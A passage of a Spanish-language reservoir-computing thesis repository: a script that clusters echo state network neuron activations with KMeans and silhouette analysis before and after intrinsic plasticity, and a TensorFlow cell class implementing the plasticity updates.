# Graficos de pares de neuronas
aux_pares=0
for i in range(units-1):
for j in range(i+1,units):
print('Par de neuronas: '+ str(i)+'_'+str(j))
aux_pares += 1
#plt.figure()
#fig, ax = plt.subplots(1, 1, figsize=(6, 6))
# define the data
x = res[:,-1, i]
y = res[:,-1, j]
points = np.transpose(np.vstack((x, y)))
# Obtencion del numero estimado de clusters
scores=[]
for n_clusters in range_n_clusters:
# Initialize the clusterer with n_clusters value and a random generator
# seed of 10 for reproducibility.
clusterer = KMeans(n_clusters=n_clusters, random_state=10)
cluster_labels = clusterer.fit_predict(points)
# The silhouette_score gives the average value for all the samples.
# This gives a perspective into the density and separation of the formed
# clusters
silhouette_avg = silhouette_score(points, cluster_labels)
scores.append([n_clusters, silhouette_avg])
max_indx=np.argmax(scores,axis=0)#Obtenemos los indices del mayor silhouette score
bestScore=scores[max_indx[1]] # obtenemos el par [n_clusters,best_score]
n_clusters=bestScore[0] # El nuevo n_clusters # Aqui vendria la condicion if n_clusters == 3, plotearse
noIP_Silhouette_BestScores.append(bestScore[1])
noIP_bestScores_clusters.append(bestScore[0])
noIP_pairs.append('Par_' + str(i) + '_' + str(j))
if n_clusters == 3: #or n_clusters == 4:
noIP_Silhouette_score.append(bestScore[1])
noIP_3clusters_scores.append(['Par_' + str(i) + '_' + str(j),bestScore,n_clusters])
# Create a subplot with 1 row and 2 columns
fig, (ax1, ax2) = plt.subplots(1, 2)
fig.set_size_inches(18, 7)
# The 1st subplot is the silhouette plot
# The silhouette coefficient can range from -1, 1 but in this example all
# lie within [-0.1, 1]
ax1.set_xlim([-0.1, 1])
# The (n_clusters+1)*10 is for inserting blank space between silhouette
# plots of individual clusters, to demarcate them clearly.
ax1.set_ylim([0, len(points) + (n_clusters + 1) * 10])
# Volvemos a hacer la clusterizacion
clusterer = KMeans(n_clusters=n_clusters, random_state=10)
cluster_labels = clusterer.fit_predict(points)
silhouette_avg = silhouette_score(points, cluster_labels)
# Contamos la cantidad de muestras por clase (o cluster)
unique_elements, counts_elements = np.unique(np.array(cluster_labels),
return_counts=True)
noIP_samples_count.append([unique_elements, counts_elements,'Par_' + str(i) + '_' + str(j)])
if max(unique_elements) == 5: #Esto para cuando clusteriza 6 grupos
noIP_6clusters_samples_count.append(np.sort(counts_elements))
if max(unique_elements) == 3: #Esto para cuando clusteriza 4 grupos
noIP_4clusters_samples_count.append(np.sort(counts_elements))
# Compute the silhouette scores for each sample
sample_silhouette_values = silhouette_samples(points, cluster_labels)
y_lower = 10
for p in range(n_clusters):
# Aggregate the silhouette scores for samples belonging to
# cluster p, and sort them
ith_cluster_silhouette_values = \
sample_silhouette_values[cluster_labels == p]
ith_cluster_silhouette_values.sort()
size_cluster_i = ith_cluster_silhouette_values.shape[0]
y_upper = y_lower + size_cluster_i
color = cm.nipy_spectral(float(p) / n_clusters)
ax1.fill_betweenx(np.arange(y_lower, y_upper),
0, ith_cluster_silhouette_values,
facecolor=color, edgecolor=color, alpha=0.7)
# Label the silhouette plots with their cluster numbers at the middle
ax1.text(-0.05, y_lower + 0.5 * size_cluster_i, str(p))
# Compute the new y_lower for next plot
y_lower = y_upper + 10 # 10 for the 0 samples
ax1.set_title("El diagrama de silueta para los diversos clusters.")
ax1.set_xlabel("Valores de coeficientes de silueta")
ax1.set_ylabel("Etiqueta de cluster")
# The vertical line for average silhouette score of all the values
ax1.axvline(x=silhouette_avg, color="red", linestyle="--")
ax1.set_yticks([]) # Clear the yaxis labels / ticks
ax1.set_xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])
# 2nd Plot showing the actual clusters formed
colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)
ax2.scatter(points[:, 0], points[:, 1], marker='.', s=30, lw=0, alpha=0.7,
c=colors, edgecolor='k')
# Labeling the clusters
centers = clusterer.cluster_centers_
# Draw white circles at cluster centers
ax2.scatter(centers[:, 0], centers[:, 1], marker='o',
c="white", alpha=1, s=200, edgecolor='k')
for p, c in enumerate(centers):
ax2.scatter(c[0], c[1], marker='$%d$' % p, alpha=1,
s=50, edgecolor='k')
ax2.set_title("Visualización de los datos agrupados.")
ax2.set_xlabel("Espacio de características para neurona "+str(i))
ax2.set_ylabel("Espacio de características para neurona "+str(j))
plt.suptitle(("Análisis de silueta mediante K Means sin Plasticidad Intrínseca "
" con n_clusters = %d" % n_clusters,
" y coeficiente = %.8f" % silhouette_avg),
fontsize=14, fontweight='bold')
plt.savefig(
savePath + experimentName + '/fig_neurons_No_IP_' + str(i) + '_' + str(j) + '_round_' + str(
z) + '.pdf')
plt.close('all')
print('pares analizados: '+str(aux_pares))
#Ploteo Radio Spectral
sr = esn.getSpectralRadius()
Radius1 = S.run(sr)
print('El radio spectral es: ' + str(Radius1))
#Verificacion del Reservorio
wr=esn.getReservoirWeights()
reservoirState= S.run(wr)
# Optimizacion del reservorio mediante IP
for e in range(3): # Un maximo de 3 epocas
print('Optimization:',e)
indx = np.random.choice(trainIPdata.shape[0], len(trainIPdata), replace=False) # Mezclar los puntos de datos
y_ip,gain,bias=esn.optimizeIPscan(tf.constant(trainIPdata[indx,:],dtype=tf.float32))
h_prev,GainRun,BiasRun = S.run([y_ip, gain, bias])
print(GainRun)
# Ejecucion con IP
print("Ejecucion con IP...")
# outputs, final_state = tf.nn.dynamic_rnn(esn, data_t, dtype=tf.float32)
# washed = tf.squeeze(tf.slice(outputs, [0, washout_size, 0], [-1, -1, -1]))
print("Computing embeddings...")
res = S.run(washed)
# Histogramas para ver la estructura de los datos (las distribuciones)
if units >= 10:
aux = 10 # Lo dejamos clavado en 10 para unicamente ver las distribuciones de las 10 primeras neuronas. Esto para resevorios con mas de 10 unidades
if units < 10:
aux = units
f, a = plt.subplots(aux, 1, figsize=(12, 22)) # Lo dejamos clavado en 10 para unicamente ver las distribuciones de las 10 primeras neuronas
plt.subplots_adjust(bottom=.08, top=.92, left=.1, right=.95, hspace=0.8, wspace=0.35)
a = a.ravel()
for idx, ax in enumerate(a):
ax.hist(res[:, -1, idx], 200, range=(-1, 1)) # Lo que hay en res son las activaciones del reservorio
ax.set_title('Neurona del Reservorio: ' + str(idx))
# ax.set_xlabel('Intervalo [-1,1]')
# ax.set_ylabel('Y')
# plt.tight_layout()
# f.suptitle('Distribuciones sin Plasticidad Intrínseca', fontsize=30) # Creo q es mejor poner en el titulo de la imagen en el latex
#plt.show()
f.savefig(savePath+experimentName+'/fig_with_IP_optim_'+str(e)+'_round_'+str(z)+'.pdf')
plt.close('all')
# Graficos de pares de neuronas (Ahora con IP)
# Ploteo radio spectral despues de la Optimizacion
sr = esn.getSpectralRadius()
Radius2 = S.run(sr)
print('El radio spectral es despues de IP: ' + str(Radius2))
withIP_Silhouette_BestScores = []
withIP_bestScores_clusters = []
withIP_pairs = []
withIP_3cluster_scores = []
withIP_Silhouette_score=[]
withIP_samples_count = []
withIP_4clusters_samples_count = []
withIP_6clusters_samples_count = []
aux_pares = 0
# Clusters en los pares de neuronas
for i in range(units-1):
for j in range(i+1,units):
print('Par de neuronas: ' + str(i) + '_' + str(j))
aux_pares += 1
#plt.figure()
#fig, ax = plt.subplots(1, 1, figsize=(6, 6))
# define the data
x = res[:, -1, i] # -1 indica el ultimo paso de tiempo
y = res[:, -1, j]
points = np.transpose(np.vstack((x, y)))
# Obtencion del numero estimado de clusters
scores = []
for n_clusters in range_n_clusters:
# Initialize the clusterer with n_clusters value and a random generator
# seed of 10 for reproducibility.
clusterer = KMeans(n_clusters=n_clusters, random_state=10)
cluster_labels = clusterer.fit_predict(points)
# The silhouette_score gives the average value for all the samples.
# This gives a perspective into the density and separation of the formed
# clusters
silhouette_avg = silhouette_score(points, cluster_labels)
scores.append([n_clusters, silhouette_avg])
max_indx = np.argmax(scores, axis=0) # Obtenemos los indices del mayor silhouette score
bestScore = scores[max_indx[1]] # obtenemos el par [n_clusters,best_score]
n_clusters = bestScore[0] # El nuevo n_clusters # Aqui vendria la condicion if n_clusters == 3, plotearse
withIP_Silhouette_BestScores.append(bestScore[1])
withIP_bestScores_clusters.append(bestScore[0])
withIP_pairs.append('Par_' + str(i) + '_' + str(j))
if n_clusters == 3: #or n_clusters == 4:
withIP_Silhouette_score.append(bestScore[1])
withIP_3cluster_scores.append(['Par_' + str(i) + '_' + str(j), bestScore,n_clusters])
# Create a subplot with 1 row and 2 columns
fig, (ax1, ax2) = plt.subplots(1, 2)
fig.set_size_inches(18, 7)
# The 1st subplot is the silhouette plot
# The silhouette coefficient can range from -1, 1 but in this example all
# lie within [-0.1, 1]
ax1.set_xlim([-0.1, 1])
# The (n_clusters+1)*10 is for inserting blank space between silhouette
# plots of individual clusters, to demarcate them clearly.
ax1.set_ylim([0, len(points) + (n_clusters + 1) * 10])
# Volvemos a hacer la clusterizacion
clusterer = KMeans(n_clusters=n_clusters, random_state=10)
cluster_labels = clusterer.fit_predict(points)
silhouette_avg = silhouette_score(points, cluster_labels)
# Compute the silhouette scores for each sample
sample_silhouette_values = silhouette_samples(points, cluster_labels)
# Contamos la cantidad de muestras por clase (o cluster)
unique_elements, counts_elements = np.unique(np.array(cluster_labels),
return_counts=True)
withIP_samples_count.append([unique_elements, counts_elements,'Par_' + str(i) + '_' + str(j)])
if max(unique_elements) == 5: # Esto para cuando clusteriza 6 grupos
withIP_6clusters_samples_count.append(np.sort(counts_elements))
if max(unique_elements) == 3: # Esto para cuando clusteriza 4 grupos
withIP_4clusters_samples_count.append(np.sort(counts_elements))
y_lower = 10
for p in range(n_clusters):
# Aggregate the silhouette scores for samples belonging to
# cluster p, and sort them
ith_cluster_silhouette_values = \
sample_silhouette_values[cluster_labels == p]
ith_cluster_silhouette_values.sort()
size_cluster_i = ith_cluster_silhouette_values.shape[0]
y_upper = y_lower + size_cluster_i
color = cm.nipy_spectral(float(p) / n_clusters)
ax1.fill_betweenx(np.arange(y_lower, y_upper),
0, ith_cluster_silhouette_values,
facecolor=color, edgecolor=color, alpha=0.7)
# Label the silhouette plots with their cluster numbers at the middle
ax1.text(-0.05, y_lower + 0.5 * size_cluster_i, str(p))
# Compute the new y_lower for next plot
y_lower = y_upper + 10 # 10 for the 0 samples
ax1.set_title("El diagrama de silueta para los diversos clusters.")
ax1.set_xlabel("Valores de coeficientes de silueta")
ax1.set_ylabel("Etiqueta de cluster")
# The vertical line for average silhouette score of all the values
ax1.axvline(x=silhouette_avg, color="red", linestyle="--")
ax1.set_yticks([]) # Clear the yaxis labels / ticks
ax1.set_xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])
# 2nd Plot showing the actual clusters formed
colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)
ax2.scatter(points[:, 0], points[:, 1], marker='.', s=30, lw=0, alpha=0.7,
c=colors, edgecolor='k')
# Labeling the clusters
centers = clusterer.cluster_centers_
# Draw white circles at cluster centers
ax2.scatter(centers[:, 0], centers[:, 1], marker='o',
c="white", alpha=1, s=200, edgecolor='k')
for p, c in enumerate(centers):
ax2.scatter(c[0], c[1], marker='$%d$' % p, alpha=1,
s=50, edgecolor='k')
ax2.set_title("Visualización de los datos agrupados.")
ax2.set_xlabel("Espacio de características para neurona "+str(i))
ax2.set_ylabel("Espacio de características para neurona "+str(j))
plt.suptitle(("Análisis de silueta mediante K Means con Plasticidad Intrínseca "
" con n_clusters = %d" % n_clusters,
" y coeficiente = %.8f" % silhouette_avg),
fontsize=14, fontweight='bold')
plt.savefig(savePath + experimentName + '/fig_neurons_With_IP_' + str(i)+'_' + str(j) +'_round_'+str(z)+ '.pdf')
#plt.show()
plt.close('all')
print('pares analizados: ' + str(aux_pares))
# Obtencion de medias de muestras por clase y almacenamiento para el caso sin IP y con IP
# Sin IP
if len(noIP_4clusters_samples_count) >= 1:
meanclass0 = np.mean(np.array(noIP_4clusters_samples_count)[:, 0])
meanclass1 = np.mean(np.array(noIP_4clusters_samples_count)[:, 1])
meanclass2 = np.mean(np.array(noIP_4clusters_samples_count)[:, 2])
meanclass3 = np.mean(np.array(noIP_4clusters_samples_count)[:, 3])
noIP_4clusters_meansamples_count = [meanclass0,meanclass1,meanclass2,meanclass3]
else:noIP_4clusters_meansamples_count =['Ningun par obtuvo 4 grupos']
if len(noIP_6clusters_samples_count) >= 1:
meanclass0 = np.mean(np.array(noIP_6clusters_samples_count)[:, 0])
meanclass1 = np.mean(np.array(noIP_6clusters_samples_count)[:, 1])
meanclass2 = np.mean(np.array(noIP_6clusters_samples_count)[:, 2])
meanclass3 = np.mean(np.array(noIP_6clusters_samples_count)[:, 3])
meanclass4 = np.mean(np.array(noIP_6clusters_samples_count)[:, 4])
meanclass5 = np.mean(np.array(noIP_6clusters_samples_count)[:, 5])
noIP_6clusters_meansamples_count = [meanclass0, meanclass1, meanclass2, meanclass3, meanclass4, meanclass5]
else:noIP_6clusters_meansamples_count =['Ningun par obtuvo 6 grupos']
# Con IP
if len(withIP_4clusters_samples_count) >= 1:
meanclass0 = np.mean(np.array(withIP_4clusters_samples_count)[:, 0])
meanclass1 = np.mean(np.array(withIP_4clusters_samples_count)[:, 1])
meanclass2 = np.mean(np.array(withIP_4clusters_samples_count)[:, 2])
meanclass3 = np.mean(np.array(withIP_4clusters_samples_count)[:, 3])
withIP_4clusters_meansamples_count = [meanclass0, meanclass1, meanclass2, meanclass3]
else:withIP_4clusters_meansamples_count = ['Ningun par obtuvo 4 grupos']
if len(withIP_6clusters_samples_count) >= 1:
meanclass0 = np.mean(np.array(withIP_6clusters_samples_count)[:, 0])
meanclass1 = np.mean(np.array(withIP_6clusters_samples_count)[:, 1])
meanclass2 = np.mean(np.array(withIP_6clusters_samples_count)[:, 2])
meanclass3 = np.mean(np.array(withIP_6clusters_samples_count)[:, 3])
meanclass4 = np.mean(np.array(withIP_6clusters_samples_count)[:, 4])
meanclass5 = np.mean(np.array(withIP_6clusters_samples_count)[:, 5])
withIP_6clusters_meansamples_count = [meanclass0, meanclass1, meanclass2, meanclass3, meanclass4,
meanclass5]
else:withIP_6clusters_meansamples_count = ['Ningun par obtuvo 6 grupos']
# Creamos un diccionario de los parametros para Imprimir en un .txt algunos de los parametros
params = {'washout_size':washout_size,'scale':scale,'connectivity':connectivity,'Number_of_labels':N
,'time_steps':time_steps,'max_length':max_length,'initial_crop':initial_crop,'maxSamples':maxSamples,'maxTrainingSamples':maxTrainingSamples
,'increment':increment,'channels':channels,'mean':mean,'std':std,'learning_rate':learning_rate
,'Architecture':str(experimentName),'num_epochs':3,'batch_size':maxSamples*N,'Spectral_Radius_No_IP':Radius1
,'Spectral_Radius_after_IP':Radius2,'Gain_Vector':str(GainRun),'Bias_Vector':str(BiasRun), 'Last_state':str(h_prev)
,'Rules':str(rules),'reservoirState':str(reservoirState),'withIP_Silhouette_BestScores':str(withIP_Silhouette_BestScores),'withIP_bestScores_clusters':str(withIP_bestScores_clusters)
,'withIP_pairs':str(withIP_pairs),'withIP_3cluster_scores':str(withIP_3cluster_scores),'noIP_Silhouette_BestScores':str(noIP_Silhouette_BestScores),'noIP_bestScores_clusters':str(noIP_bestScores_clusters)
,'noIP_pairs':str(noIP_pairs),'noIP_3clusters_scores':str(noIP_3clusters_scores)
,'noIP_2clusters_count':noIP_bestScores_clusters.count(2),'noIP_3clusters_count':noIP_bestScores_clusters.count(3),'noIP_4clusters_count':noIP_bestScores_clusters.count(4),'noIP_5clusters_count':noIP_bestScores_clusters.count(5),'noIP_6clusters_count':noIP_bestScores_clusters.count(6),'noIP_7clusters_count':noIP_bestScores_clusters.count(7),'noIP_8clusters_count':noIP_bestScores_clusters.count(8)
,'withIP_2clusters_count':withIP_bestScores_clusters.count(2),'withIP_3clusters_count':withIP_bestScores_clusters.count(3),'withIP_4clusters_count':withIP_bestScores_clusters.count(4), 'withIP_5clusters_count':withIP_bestScores_clusters.count(5), 'withIP_6clusters_count':withIP_bestScores_clusters.count(6), 'withIP_7clusters_count':withIP_bestScores_clusters.count(7), 'withIP_8clusters_count':withIP_bestScores_clusters.count(8)
,'mean_silhouette_score_withIP':str(np.mean(withIP_Silhouette_score)),'mean_silhouette_score_noIP':str(np.mean(noIP_Silhouette_score)),'silhouette_score_withIP':str(withIP_Silhouette_score),'silhouette_score_noIP':str(noIP_Silhouette_score),'withIP_samples_count_ofclusters':str(withIP_samples_count),'noIP_samples_count_ofclusters':str(noIP_samples_count)
,'noIP_4clusters_meansamples_count':str(noIP_4clusters_meansamples_count),'noIP_6clusters_meansamples_count':str(noIP_6clusters_meansamples_count),'withIP_4clusters_meansamples_count':str(withIP_4clusters_meansamples_count),'withIP_6clusters_meansamples_count':str(withIP_6clusters_meansamples_count)}
writeDictinTXTfile(savePath, experimentName, params,z)
print('Datos_Parametros_Guardados')
# Almacenamiento de metricas para el resumen
evolutionSR_NoIP.append(Radius1)
evolutionSR_WithIP.append(Radius2)
noIP_2clusters_count.append(noIP_bestScores_clusters.count(2))
noIP_3clusters_count.append(noIP_bestScores_clusters.count(3))
noIP_4clusters_count.append(noIP_bestScores_clusters.count(4))
noIP_5clusters_count.append(noIP_bestScores_clusters.count(5))
noIP_6clusters_count.append(noIP_bestScores_clusters.count(6))
noIP_7clusters_count.append(noIP_bestScores_clusters.count(7))
noIP_8clusters_count.append(noIP_bestScores_clusters.count(8))
withIP_2clusters_count.append(withIP_bestScores_clusters.count(2))
withIP_3clusters_count.append(withIP_bestScores_clusters.count(3))
withIP_4clusters_count.append(withIP_bestScores_clusters.count(4))
withIP_5clusters_count.append(withIP_bestScores_clusters.count(5))
withIP_6clusters_count.append(withIP_bestScores_clusters.count(6))
withIP_7clusters_count.append(withIP_bestScores_clusters.count(7))
withIP_8clusters_count.append(withIP_bestScores_clusters.count(8))
Silouethe_scores_means_IP.append(str(np.mean(withIP_Silhouette_score)))
Silouethe_scores_means_noIP.append(str(np.mean(noIP_Silhouette_score)))
noIP_samples_4clusters_count.append(noIP_4clusters_meansamples_count)
noIP_samples_6clusters_count.append(noIP_6clusters_meansamples_count)
withIP_samples_4clusters_count.append(withIP_4clusters_meansamples_count)
withIP_samples_6clusters_count.append(withIP_6clusters_meansamples_count)
#Conteo de muestras por grupo promedio de las 10 rondas
# #No Ip
# meanclass0 = np.mean(np.array(noIP_samples_4clusters_count)[:, 0])
# meanclass1 = np.mean(np.array(noIP_samples_4clusters_count)[:, 1])
# meanclass2 = np.mean(np.array(noIP_samples_4clusters_count)[:, 2])
# meanclass3 = np.mean(np.array(noIP_samples_4clusters_count)[:, 3])
#
# noIP_4clusters_mean10rounds_samplescount = [meanclass0, meanclass1, meanclass2, meanclass3]
#
# meanclass0 = np.mean(np.array(noIP_samples_6clusters_count)[:, 0])
# meanclass1 = np.mean(np.array(noIP_samples_6clusters_count)[:, 1])
# meanclass2 = np.mean(np.array(noIP_samples_6clusters_count)[:, 2])
# meanclass3 = np.mean(np.array(noIP_samples_6clusters_count)[:, 3])
# meanclass4 = np.mean(np.array(noIP_samples_6clusters_count)[:, 4])
# meanclass5 = np.mean(np.array(noIP_samples_6clusters_count)[:, 5])
#
# noIP_6clusters_mean10rounds_samplescount = [meanclass0, meanclass1, meanclass2, meanclass3, meanclass4, meanclass5]
#
# # Con IP
# meanclass0 = np.mean(np.array(withIP_samples_4clusters_count)[:, 0])
# meanclass1 = np.mean(np.array(withIP_samples_4clusters_count)[:, 1])
# meanclass2 = np.mean(np.array(withIP_samples_4clusters_count)[:, 2])
# meanclass3 = np.mean(np.array(withIP_samples_4clusters_count)[:, 3])
#
# withIP_4clusters_mean10rounds_samplescount = [meanclass0, meanclass1, meanclass2, meanclass3]
#
# meanclass0 = np.mean(np.array(withIP_samples_6clusters_count)[:, 0])
# meanclass1 = np.mean(np.array(withIP_samples_6clusters_count)[:, 1])
# meanclass2 = np.mean(np.array(withIP_samples_6clusters_count)[:, 2])
# meanclass3 = np.mean(np.array(withIP_samples_6clusters_count)[:, 3])
# meanclass4 = np.mean(np.array(withIP_samples_6clusters_count)[:, 4])
# meanclass5 = np.mean(np.array(withIP_samples_6clusters_count)[:, 5])
#
# withIP_6clusters_mean10rounds_samplescount = [meanclass0, meanclass1, meanclass2, meanclass3, meanclass4,
# meanclass5]
summary = {'washout_size':washout_size,'scale':scale,'connectivity':connectivity,'Number_of_labels':N
,'time_steps':time_steps,'max_length':max_length,'initial_crop':initial_crop,'maxSamples':maxSamples,'maxTrainingSamples':maxTrainingSamples
,'increment':increment,'channels':channels,'mean':mean,'std':std,'learning_rate':learning_rate
,'Architecture':str(experimentName),'num_IP_epochs':3,'batch_size':maxSamples*N
,'Rules':str(rules),'evolutionSR_NoIP':str(evolutionSR_NoIP),'evolutionSR_WithIP':str(evolutionSR_WithIP)
,'noIP_2clusters_count':str(noIP_2clusters_count),'noIP_3clusters_count':str(noIP_3clusters_count),'noIP_4clusters_count':str(noIP_4clusters_count),'noIP_5clusters_count':str(noIP_5clusters_count),'noIP_6clusters_count':str(noIP_6clusters_count),'noIP_7clusters_count':str(noIP_7clusters_count),'noIP_8clusters_count':str(noIP_8clusters_count)
,'withIP_2clusters_count':str(withIP_2clusters_count),'withIP_3clusters_count':str(withIP_3clusters_count),'withIP_4clusters_count':str(withIP_4clusters_count),'withIP_5clusters_count':str(withIP_5clusters_count),'withIP_6clusters_count':str(withIP_6clusters_count),'withIP_7clusters_count':str(withIP_7clusters_count),'withIP_8clusters_count':str(withIP_8clusters_count),'noIP_Silhouette_score_6clusters':str(noIP_Silhouette_score)
,'withIP_Silhouette_score_6clusters':str(withIP_Silhouette_score),'mean_noIP_2clusters_count':str(np.mean(noIP_2clusters_count)),'mean_noIP_3clusters_count':str(np.mean(noIP_3clusters_count)),'mean_noIP_4clusters_count':str(np.mean(noIP_4clusters_count)),'mean_noIP_5clusters_count':str(np.mean(noIP_5clusters_count)),'mean_noIP_6clusters_count':str(np.mean(noIP_6clusters_count)),'mean_noIP_7clusters_count':str(np.mean(noIP_7clusters_count)),'mean_noIP_8clusters_count':str(np.mean(noIP_8clusters_count))
,'mean_withIP_2clusters_count':str(np.mean(withIP_2clusters_count)),'mean_withIP_3clusters_count':str(np.mean(withIP_3clusters_count)),'mean_withIP_4clusters_count':str(np.mean(withIP_4clusters_count)),'mean_withIP_5clusters_count':str(np.mean(withIP_5clusters_count)),'mean_withIP_6clusters_count':str(np.mean(withIP_6clusters_count)),'mean_withIP_7clusters_count':str(np.mean(withIP_7clusters_count)),'mean_withIP_8clusters_count':str(np.mean(withIP_8clusters_count))
,'Silouethe_scores_means_IP':str(Silouethe_scores_means_IP),'Silouethe_scores_means_noIP':str(Silouethe_scores_means_noIP),'noIP_4clusters_mean10rounds_samplescount':str(noIP_samples_4clusters_count),'noIP_6clusters_mean10rounds_samplescount':str(noIP_samples_6clusters_count),'withIP_4clusters_mean10rounds_samplescount':str(withIP_samples_4clusters_count),'withIP_6clusters_mean10rounds_samplescount':str(withIP_samples_6clusters_count)}
writeDictinTXTfile(savePath, experimentName, summary, 'summary')
print('Datos_Resumen_Guardados')
<file_sep>/README.md
# TFM
Reservorios y Optimización con IP
<file_sep>/esn_ip_cell.py
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.framework.ops import convert_to_tensor
import tensorflow as tf
class ESNIPCell(
rnn_cell_impl.RNNCell): # la clase ESNIPCell vendria a ser como una subclase de rnn_cell_impl.RNNCell, esto ayuda a proporcionar el estado cero
"""Echo State Network Cell.
Based on http://www.faculty.jacobs-university.de/hjaeger/pubs/EchoStatesTechRep.pdf
Only the reservoir, the randomized recurrent layer, is modelled. The readout trainable layer
which map reservoir output to the target output is not implemented by this cell,
thus neither are feedback from readout to the reservoir (a quite common technique).
Here a practical guide to use Echo State Networks:
http://minds.jacobs-university.de/sites/default/files/uploads/papers/PracticalESN.pdf
Since at the moment TF doesn't provide a way to compute spectral radius
of a matrix the echo state property necessary condition `max(eig(W)) < 1` is approximated
scaling the norm 2 of the reservoir matrix which is an upper bound of the spectral radius.
See https://en.wikipedia.org/wiki/Matrix_norm, the section on induced norms.
Every `RNNCell` must have the properties below and implement `call` with
the signature `(output, next_state) = call(input, state)`. The optional
third input argument, `scope`, is allowed for backwards compatibility
purposes; but should be left off for new subclasses.
This definition of cell differs from the definition used in the literature.
In the literature, 'cell' refers to an object with a single scalar output.
This definition refers to a horizontal array of such units.
An RNN cell, in the most abstract setting, is anything that has
a state and performs some operation that takes a matrix of inputs.
"""
def __init__(self, num_units, wr2_scale=0.7, connectivity=0.3, leaky=1.0, activation=math_ops.tanh, scope=None,
input_size=1, dtype=tf.float32, mean=0., std=0.6, learning_rate=0.001,
win_init=init_ops.random_normal_initializer(),
# Los parametros input_size y dtype tratar de pasarlos desde fuera
wr_init=init_ops.random_normal_initializer(),
bias_init=init_ops.random_normal_initializer()):
"""Initialize the Echo State Network Cell.
Args:
num_units: Int or 0-D Int Tensor, the number of units in the reservoir
wr2_scale: desired norm2 of reservoir weight matrix.
`wr2_scale < 1` is a sufficient condition for echo state property.
connectivity: connection probability between two reservoir units
leaky: leaky parameter
activation: activation function
win_init: initializer for input weights
wr_init: used to initialize reservoir weights before applying connectivity mask and scaling
bias_init: initializer for biases
"""
self._num_units = num_units
self._leaky = leaky
self._activation = activation
self._input_size = input_size # Ingresar como argumento cuando se instancia la clase ESN
self._dtype = dtype
self.__scope = scope
self._mean = mean
self._learning_rate = learning_rate
self._std = std
def _wr_initializer(shape, dtype, partition_info=None):
wr = wr_init(shape, dtype=dtype)
connectivity_mask = math_ops.cast(
math_ops.less_equal(
random_ops.random_uniform(shape),
connectivity),
dtype)
wr = math_ops.multiply(wr, connectivity_mask)
wr_norm2 = math_ops.sqrt(math_ops.reduce_sum(math_ops.square(wr)))
is_norm_0 = math_ops.cast(math_ops.equal(wr_norm2, 0), dtype)
wr = wr * wr2_scale / (wr_norm2 + 1 * is_norm_0)
return wr
self._win_initializer = win_init
self._bias_initializer = bias_init
self._wr_initializer = _wr_initializer
@property
def output_size(self):
return self._num_units
@property
def state_size(self):
return self._num_units
def get_states(self, y_prev, data_val):
h_prev=y_prev[0:self._num_units]
a=y_prev[self._num_units:2*self._num_units]
b=y_prev[2*self._num_units:3*self._num_units]
h_prev = tf.reshape(h_prev, [1, self._num_units]) # h_prev seria state
data_val = tf.reshape(data_val,
[1, self._input_size]) # Es necesario xq h_prev y data_val llegan como (30,) y (3,)
#with vs.variable_scope(self.__scope or type(self).__name__, reuse=tf.AUTO_REUSE): # "ESNCell"
#with vs.variable_scope('rnn/ESNIPCell', reuse=tf.AUTO_REUSE):
win = vs.get_variable("InputMatrix", [self._input_size, self._num_units], dtype=self._dtype,
trainable=False, initializer=self._win_initializer)
wr = vs.get_variable("ReservoirMatrix", [self._num_units, self._num_units], dtype=self._dtype,
trainable=False, initializer=self._wr_initializer)
diag_a = tf.diag(a) # dim 30x30
_wr = math_ops.matmul(diag_a, wr) # dim 30x30
_win = math_ops.matmul(win, diag_a) # dim 3x30
# h_prev/state comienza en ceros
in_mat = array_ops.concat([data_val, h_prev], axis=1) # concat[1x3,1x30] ==> inmat dim = 1x33
weights_mat = array_ops.concat([_win, _wr], axis=0) # concat[3x30,30x30] ==> weigmat dim = 33x30
# Obtencion de nuestros valores x e y para IP
x_a = math_ops.matmul(in_mat, weights_mat) + b # dim 1x30 + 1x30
y_ip = self._activation(x_a) # dim 1x30
# Reglas para el caso de tanh, Aquí se debe seleccionar las otras reglas en caso de que sea fermi
g_b = -self._learning_rate * (-(self._mean / tf.pow(self._std, 2)) + (y_ip / tf.pow(self._std, 2)) * (
2 * tf.pow(self._std, 2) + 1 - tf.pow(y_ip, 2) + self._mean * y_ip))
g_a = (self._learning_rate / a) + g_b * x_a
_a = a + g_a
_b = b + g_b
# Asignación de las variables a y b
c=tf.squeeze(_a) #Se le debe poner el assing aqui tambien?
d=tf.squeeze(_b)
return tf.concat([tf.squeeze(y_ip),c,d],axis=0)
def optimizeIPscan(self, train_sequence):
with vs.variable_scope('rnn/ESNIPCell',reuse=tf.AUTO_REUSE):
# Parametros de IP, ganancia a y bias b
a = vs.get_variable("GainVector", [self._num_units], dtype=self._dtype,
trainable=True, initializer=tf.ones_initializer())
b = vs.get_variable("Bias", [self._num_units], dtype=self._dtype, trainable=True,
initializer=tf.zeros_initializer())
initial_state = tf.zeros([self._num_units])
initial_state = tf.concat([initial_state, a, b], axis=0)
#data = tf.squeeze(train_sequence)
ip_states = tf.scan(self.get_states, train_sequence, initializer=initial_state)
states = ip_states[-1,:] # No se si hacer esto esta bien (aunq esto no es una dynamic rnn, ni la red recurrente)
h_final = states[0:self._num_units]
c = a.assign(states[self._num_units:2*self._num_units])
d = b.assign(states[2*self._num_units: 3*self._num_units])
#Tomar el ultimo de states, tomar a y b y eso asignar
return h_final,c,d
def getSpectralRadius(self):
with vs.variable_scope('rnn/ESNIPCell', reuse=tf.AUTO_REUSE):
wr = vs.get_variable("ReservoirMatrix", [self._num_units, self._num_units], dtype=self._dtype,
trainable=False, initializer=self._wr_initializer)
a = vs.get_variable("GainVector", [self._num_units], dtype=self._dtype,
trainable=True, initializer=tf.ones_initializer())
b = vs.get_variable("Bias", [self._num_units], dtype=self._dtype, trainable=True,
initializer=tf.zeros_initializer())
diag_a = tf.diag(a)
_wr = math_ops.matmul(diag_a, wr)+b
wr_norm2 = math_ops.sqrt(math_ops.reduce_sum(math_ops.square(_wr)))
return wr_norm2
def getReservoirWeights(self):
with vs.variable_scope('rnn/ESNIPCell', reuse=tf.AUTO_REUSE):
wr = vs.get_variable("ReservoirMatrix", [self._num_units, self._num_units], dtype=self._dtype,
trainable=False, initializer=self._wr_initializer)
return wr
def __call__(self, inputs, state, scope=None):
